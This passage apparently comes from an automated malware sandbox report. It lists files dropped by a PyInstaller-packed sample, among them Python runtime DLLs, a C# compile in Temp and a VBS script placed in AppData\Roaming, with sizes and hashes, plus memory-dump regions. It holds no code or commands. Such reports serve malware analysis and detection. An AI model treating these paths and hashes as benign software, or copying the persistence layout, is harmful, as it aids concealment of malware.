SHA512
410c1e009b2c65c4c42c4d926a5fe9a4a4a0744872a4497ad0bb20c40897264124bd653490cba5214a6bfdb8b5ab3681d7c796e2ffe63107da3ba65194381e09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\_ctypes.pyd

Filesize
55KB

MD5
216682f01cb4fd3fbf5d31674f5ff9cf

SHA1
4b24fc944e6998280098ca207e0ea33e52767996

SHA256
8dbef8fd9ce588db70b9f35b408d361f5d0cece4cb9a9edfeb75f9532a0ea92d

SHA512
c97d96807bd8fffb55dd031482e926d0ef8923f4520083aec03bdd36d249d61e7cacde99fa7981f453408941cbec609e228f19487c780855b1add2a72fc00a98

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\_decimal.pyd

Filesize
107KB

MD5
c1c494b8380c29ced226860acedc4095

SHA1
41cc7139ec35aa082d4f4bc348fe3ef99666f5c3

SHA256
1ad4d1c69ca6a4beb174085fae0e65537476a4ea44b394927549900233cd7e70

SHA512
aaaa74a1b2494ac47124c24871ae7cc71f834731225210a1548decb01c4ece29321a1f01da45a284f6e3aaf31b4ecc9e1dc25279339507be9d8dfd318ed0aebb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\_hashlib.pyd

Filesize
27KB

MD5
e9aa28173e7db0432aabd1b0baf3410d

SHA1
ce29a7301e728d67e9994687f49fe7cf1e0b7c68

SHA256
18b004d57a43a2eb522a52c713f11fe805b373c61f064e6d288015d828251311

SHA512
a60c2e9b3d67b47b68c0a2eddedf2a0167082c180fc1bc247b34fd3e7fc40d708e01c6b202a8b54c36e86252b2c419a519974ac89b8048f736020ff93868c945

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\_lzma.pyd

Filesize
81KB

MD5
c0af87822386bd3a1d44cab21c644866

SHA1
f19ce82573538a46cd150841d7b1d1adad7c0d43

SHA256
1f81f40a76ada929a590f56ffaa16c5d610fd65f89213858837ecc9b0f1952f4

SHA512
51d0b819e0d79628af6f028306ae8730b640c04bc4087d9611fbbd6d5c3b6cdc56f2357813a01168e01afe0f0b3402fa151ba009f5af3f5696735adc41a3b6db

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\_queue.pyd

Filesize
21KB

MD5
9cb23d7372b166013adde2f53ba7a112

SHA1
89efeb10324b8a8a0e2d763a7087b515d2368122

SHA256
376584e748ce83446160b0315bb85bed33b31ac6e25e573fa22e56c1cf96e82a

SHA512
dcff6cc1b8b6240b9ab6ebc02ab9b085bc2a532d2c37b002e17dbbdee0a3d66f5e12c8b5dc4168fdf53dafc648152ddfcd52e0cce2c04cbf8ef9db4d601d29ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\_socket.pyd

Filesize
39KB

MD5
50e71ec18045021bc098b2b0aed1813b

SHA1
804685545b2633cb36d8cea8d6b0604d45da531d

SHA256
d3a48b335b62b37d467e4d36e514101bd9215f66356cb16ecf750ee78cc2d323

SHA512
cec2589a1d836be599aa1ba5c33b88feb3a805d42658cbb631fba810948f85c34382a223ac26a72b7eaf0f1d30ba2e368c3d2e4ae7ff32f25fc1d6e739f24310

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\_ssl.pyd

Filesize
50KB

MD5
fea35ba9d29d6aac516c26d09007e2c9

SHA1
1280f308d93cc7c03c779ab174b2caf439fd47c1

SHA256
bac2fb525115bb2d231bc218d0e75d9120314521f16a097851ae96bf7ae51dc0

SHA512
4a7d6a63e255bdb621d226b61707dde66e7f1f6f462f7f7049eba05f28f07edd457ef6daf59e11ea08506c28627b1e4fbaa328c27fd048df70ff95b98d424d8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\base_library.zip

Filesize
1004KB

MD5
eaaf60a810aea2e6bb237cba9ebe71e9

SHA1
1132b6fe884d5906752f89ea4513350cb411fdf1

SHA256
ac892d177ae2bb78056b1966b21d19f607044d246580008b6ab9825662ad7fcd

SHA512
3ea2411afd4f4e67d0d9d305b5767925d41efafddada3f24ef4bc3e4f9f7e88f5941a32fec3738d8f76b92510c0bd355f5bf4009d1ce46b6d9f76f1af0f96b29

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\certifi\cacert.pem

Filesize
277KB

MD5
edd513e1d62ca2b059821b8380c19d19

SHA1
7e785afc6a7174f008b8b6e775c91c018d72aee3

SHA256
870068ef78059c5d012a23f715029f1b7db19060e1c65e12c024221f6ac32abd

SHA512
31450f875b46bbbb8e8d2f2e075f82ab4cfe175dadd966be22c66206d5dc2517a870a8cfc46f2f094b6810c09b447bd46354b67c128843b997957522d3cf4f5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\libcrypto-1_1.dll

Filesize
1.1MB

MD5
32cbd9ff7c75634dd4cf282e218e5e5f

SHA1
a2d19b46736e4979a3974e4079cb43dea27a7fec

SHA256
44acd462cd91834ff39595bd022115b0f226a01b8cfefb240b3be72dbcc5be6b

SHA512
a7db2541a119701926eea097374b7d4bb281693bd01a31a019a07c0cb0988643c803c5216a295ecad670c9371760e289851df5fc5d94776544e880cb4136aa5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\libffi-7.dll

Filesize
23KB

MD5
b5150b41ca910f212a1dd236832eb472

SHA1
a17809732c562524b185953ffe60dfa91ba3ce7d

SHA256
1a106569ac0ad3152f3816ff361aa227371d0d85425b357632776ac48d92ea8a

SHA512
9e82b0caa3d72bb4a7ad7d66ebfb10edb778749e89280bca67c766e72dc794e99aab2bc2980d64282a384699929ce6cc996462a73584898d2df67a57bff2a9c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\libssl-1_1.dll

Filesize
196KB

MD5
6eddc102f5c63f22d7862a542b0a96f0

SHA1
a7018895576bfbbdd5c437427e54de279b738233

SHA256
ca7f5b7245d5dbdabbea7d475a3687be2cbdb0007e4f8d36491ca2ff9221be1e

SHA512
113d2cbf432c0ac48265fcbbf0ae5f95ce0ef1d397a879bb539715213b47662488ffc9f4738d7dcd80861bd1acb1631ef4d30e733123931151e552a2e0f557ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\python3.dll

Filesize
57KB

MD5
11a8500bc31356fae07dd604d6662efb

SHA1
4b260e5105131cdcae9313d1833cce0004c02858

SHA256
521f17a2caab35730bfdccb954704a6ffc035d4f7ea24208c76f6a45f30fd0b6

SHA512
15f967bdf3c64c7435bfa48fe4a8c3157b4568c08f396bc20fde7cb802aa0a633afaa987b1ebdf7851c6aa405e65f28d754bca8e06ff0a3b54f6da9a6d81d7c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\python38.dll

Filesize
1.4MB

MD5
687bac86f9a2330d898903ee91d332d7

SHA1
af40c22b253a130ae0ef0300c746faa8ff3e52b8

SHA256
72793448d6feba5b6a07053d39474c239b0932a867580ac7c3fc2aa417b4eacf

SHA512
d471f0212089b94d9d70852ff398e7a3241c1c6680f2b5fffdb9756182184a4bab4f52d21ab511512b3658306e44a6dc924b4bd64b8b2b6cdbf546e07b936135

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\select.pyd

Filesize
21KB

MD5
9ecbd2b240256b4443b54cdb892cff71

SHA1
7a75f149b05e017f7b94fd3d07551995be53616f

SHA256
6fce6db4bafee285c9ca06b0b088aa1f18d43409125981e4e4c8954c9ee20846

SHA512
48f91ce8d273d51c27a1b9bf6c581d42e0d79b39dcb41f6e4ff202190e4b7e0d6f5e87f2933a84c0838874155608aedacbd8d20f76688732da671e5b2d6ed5f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\ucrtbase.dll

Filesize
1002KB

MD5
298e85be72551d0cdd9ed650587cfdc6

SHA1
5a82bcc324fb28a5147b4e879b937fb8a56b760c

SHA256
eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84

SHA512
3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45002\unicodedata.pyd

Filesize
280KB

MD5
5008d7328699c64b8c6efca2f3cd99b0

SHA1
b8b558a51be19a945fccd0c8d08a4343e808c38a

SHA256
748c0e27fd7e86f7c704d3f772a40cffd5f4fe86e0996917c5a144278df0701d

SHA512
e7e29ac83e75e6da73763fb8e5a612d04b8ea7639ddced75c2e31d1ca607517261363d2c6584d2a4376e8e1dd7f20db3ae0b6d4d348cc9e5c8dd4ed2ac199899

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nbxwwhh0.ogy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\o534rzqz\o534rzqz.dll

Filesize
7KB

MD5
95689721ec22278943d2c255a7350524

SHA1
8dae0cfdf09f050680d61e53f829929d3c289a71

SHA256
19920aba3838839f2376ba16c2324608f19212fae31e3db09bad1074b8320037

SHA512
11dd9ece25e0527527c67894299c7add277e71853d06c6394e7a7774e4381daa5fb0d9ead44e754d8422a51386285ad6b8606c8106c6dd0b86519689b1c7738d

Download Submit
C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs

Filesize
3KB

MD5
b73dc14e83c35d9c4fba66539634d249

SHA1
d78300e7372da3df6c8341478091dc9abaeff28a

SHA256
16f8d864a65be446febd4602bf644d0452e6372e7ec8b8d2e3d50d8dc3c71553

SHA512
130a190a58765a25e385365777cc14a42c56b5d03b44e1c82555c918acd45d7723eda345135e03aa5983cf79792209e8453dc09c6ed027fa6e380151af267eb6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o534rzqz\CSCFEE0349545DB41A3AA854EE895887E1F.TMP

Filesize
652B

MD5
5c70ea2fb4859eddd79e9fc4c950e587

SHA1
faa792a34785d7ef50dab8c6ecfce8fadd9edc90

SHA256
2c692e2b45b3d25cc6c21efc90a3abed0c026fc89d5648da0111171459bb4856

SHA512
15b3a5798ebefaec01501dd1bc11b2a083d77c3cfd9f863368ea49b7e465c01ba8ae3abe1690009d5c456d1a25d14fbfe9ba7935cc3bef672f84cd2578231d2f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o534rzqz\o534rzqz.0.cs

Filesize
8KB

MD5
96abe1dd385b1c723e8c5833aa3cdfee

SHA1
66c0638a3c2893e7fa2b7745601c15e22cdc8060

SHA256
90ff1e4493446751ad38983237349b90568304ab4d10d56205cc010d23e6ac58

SHA512
66f2d65e7d8a168b618ccc203dedad2c8abcbd2a4d94f6e1816b0a425962946b8128203801761a67508faa935af13b8fc73cf30505ba55006d146c3e5b56a77c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\o534rzqz\o534rzqz.cmdline

Filesize
369B

MD5
9a42fd45765d2688e93ef9cf1b8abef6

SHA1
53e2d02956eb629fbb4d415031c204fed80b0268

SHA256
291e863b9220564d88a0b4336488b5ac0e398ced9aaf7befa4dfb8e5ca7bbebe

SHA512
767c61b3060656d968be08f2c05173688657bc9c531219b38905be370b05d77ba296b1afd8102e5a2df23cbdcad7979639bcdfe75d3b48f2f5285a657796dd21

Download Submit
memory/448-190-0x0000000006D80000-0x0000000006D88000-memory.dmp

Filesize
32KB

Download
memory/448-172-0x00000000067A0000-0x00000000067BE000-memory.dmp

Filesize
120KB

Download
memory/448-170-0x0000000006170000-0x00000000064C4000-memory.dmp

Filesize
3.3MB

Download
memory/448-160-0x00000000060C0000-0x0000000006126000-memory.dmp

Filesize
408KB

Download
memory/448-173-0x00000000067D0000-0x000000000681C000-memory.dmp

Filesize
304KB

Download
memory/448-159-0x0000000005FA0000-0x0000000006006000-memory.dmp

Filesize
408KB

Download
memory/448-158-0x00000000058D0000-0x00000000058F2000-memory.dmp

Filesize
136KB

Download
memory/448-174-0x0000000007FD0000-0x000000000864A000-memory.dmp

Filesize
6.5MB

Download
memory/448-157-0x0000000005900000-0x0000000005F28000-memory.dmp

Filesize
6.2MB

Download
memory/448-175-0x0000000006CE0000-0x0000000006CFA000-memory.dmp

Filesize
104KB

Download
memory/448-154-0x00000000051E0000-0x0000000005216000-memory.dmp

Filesize
216KB

Download
memory/756-194-0x0000000005670000-0x0000000005C14000-memory.dmp

Filesize
5.6MB

Download
memory/756-198-0x0000000006380000-0x00000000063BC000-memory.dmp

Filesize
240KB

Download
memory/756-200-0x00000000066E0000-0x00000000066EA000-memory.dmp

Filesize
40KB

Download
memory/756-197-0x0000000005640000-0x0000000005652000-memory.dmp

Filesize
72KB

Download
memory/756-195-0x00000000051E0000-0x0000000005272000-memory.dmp

Filesize
584KB

Download
memory/756-193-0x0000000000400000-0x000000000044E000-memory.dmp

Filesize
312KB

Download
memory/2004-132-0x00007FF98BF10000-0x00007FF98BFE6000-memory.dmp

Filesize
856KB

Download
memory/2004-103-0x00007FF995BC0000-0x00007FF995C04000-memory.dmp

Filesize
272KB

Download
memory/2004-143-0x00007FF99B0A0000-0x00007FF99B0B9000-memory.dmp

Filesize
100KB

Download
memory/2004-236-0x00007FF6D5290000-0x00007FF6D58DD000-memory.dmp

Filesize
6.3MB

Download
memory/2004-137-0x00007FF98CC10000-0x00007FF98CC57000-memory.dmp

Filesize
284KB

Download
memory/2004-96-0x00007FF99BCC0000-0x00007FF99BCE4000-memory.dmp

Filesize
144KB

Download
memory/2004-99-0x00007FF99B220000-0x00007FF99B23B000-memory.dmp

Filesize
108KB

Download
memory/2004-106-0x00007FF99B0A0000-0x00007FF99B0B9000-memory.dmp

Filesize
100KB

Download
memory/2004-109-0x00007FF99B1F0000-0x00007FF99B1FD000-memory.dmp

Filesize
52KB

Download
memory/2004-112-0x00007FF996980000-0x00007FF9969A6000-memory.dmp

Filesize
152KB

Download
memory/2004-118-0x00007FF6D5290000-0x00007FF6D58DD000-memory.dmp

Filesize
6.3MB

Download
memory/2004-119-0x00007FF98BFF0000-0x00007FF98C0A5000-memory.dmp

Filesize
724KB

Download
memory/2004-120-0x0000026147D10000-0x0000026148079000-memory.dmp

Filesize
3.4MB

Download
memory/2004-121-0x00007FF98B3D0000-0x00007FF98B739000-memory.dmp

Filesize
3.4MB

Download
memory/2004-129-0x00007FF98B9F0000-0x00007FF98BE32000-memory.dmp

Filesize
4.3MB

Download
memory/2004-131-0x00007FF99B1E0000-0x00007FF99B1ED000-memory.dmp

Filesize
52KB

Download
memory/2004-178-0x00007FF996980000-0x00007FF9969A6000-memory.dmp

Filesize
152KB

Download
memory/2004-179-0x0000026147D10000-0x0000026148079000-memory.dmp

Filesize
3.4MB

Download
memory/2004-219-0x00007FF6D5290000-0x00007FF6D58DD000-memory.dmp

Filesize
6.3MB

Download
memory/2004-133-0x00007FF99AE50000-0x00007FF99AE60000-memory.dmp

Filesize
64KB

Download
memory/2004-202-0x00007FF6D5290000-0x00007FF6D58DD000-memory.dmp

Filesize
6.3MB

Download
memory/2004-139-0x00007FF98ACF0000-0x00007FF98AE02000-memory.dmp

Filesize
1.1MB

Download
memory/2004-97-0x00007FF99B240000-0x00007FF99B24F000-memory.dmp

Filesize
60KB

Download
memory/2004-80-0x00007FF6D5290000-0x00007FF6D58DD000-memory.dmp

Filesize
6.3MB

Download
memory/2004-192-0x00007FF98BFF0000-0x00007FF98C0A5000-memory.dmp

Filesize
724KB

Download
memory/2004-87-0x00007FF98B9F0000-0x00007FF98BE32000-memory.dmp

Filesize
4.3MB

Download
memory/2004-79-0x00007FF6D5290000-0x00007FF6D58DD000-memory.dmp

Filesize
6.3MB

Download
memory/2004-78-0x00007FF6D5290000-0x00007FF6D58DD000-memory.dmp

Filesize
6.3MB

Download
memory/2004-196-0x00007FF98B3D0000-0x00007FF98B739000-memory.dmp

Filesize
3.4MB

Download
memory/2004-204-0x00007FF99BCC0000-0x00007FF99BCE4000-memory.dmp

Filesize
144KB

Download
memory/2004-203-0x00007FF98B9F0000-0x00007FF98BE32000-memory.dmp

Filesize
4.3MB

Download
memory/2004-206-0x00007FF99B220000-0x00007FF99B23B000-memory.dmp

Filesize
108KB

Download
memory/2004-207-0x00007FF995BC0000-0x00007FF995C04000-memory.dmp

Filesize
272KB

Download
memory/2436-144-0x0000027A4D250000-0x0000027A4D272000-memory.dmp

Filesize
136KB

Download
memory/4500-1-0x00007FF6D5290000-0x00007FF6D58DD000-memory.dmp

Filesize
6.3MB

Download
memory/4500-2-0x00007FF6D5290000-0x00007FF6D58DD000-memory.dmp

Filesize
6.3MB

Download
memory/4500-201-0x00007FF6D5290000-0x00007FF6D58DD000-memory.dmp

Filesize
6.3MB

Download
memory/4500-3-0x00007FF6D5290000-0x00007FF6D58DD000-memory.dmp

Filesize
6.3MB

Download
memory/4500-117-0x00007FF6D5290000-0x00007FF6D58DD000-memory.dmp

Filesize
6.3MB

Download
memory/4500-0-0x00007FF6D5290000-0x00007FF6D58DD000-memory.dmp

Filesize
6.3MB

Download
memory/4500-235-0x00007FF6D5290000-0x00007FF6D58DD000-memory.dmp

Filesize
6.3MB

Download
memory/4500-252-0x00007FF6D5290000-0x00007FF6D58DD000-memory.dmp

Filesize
6.3MB

Download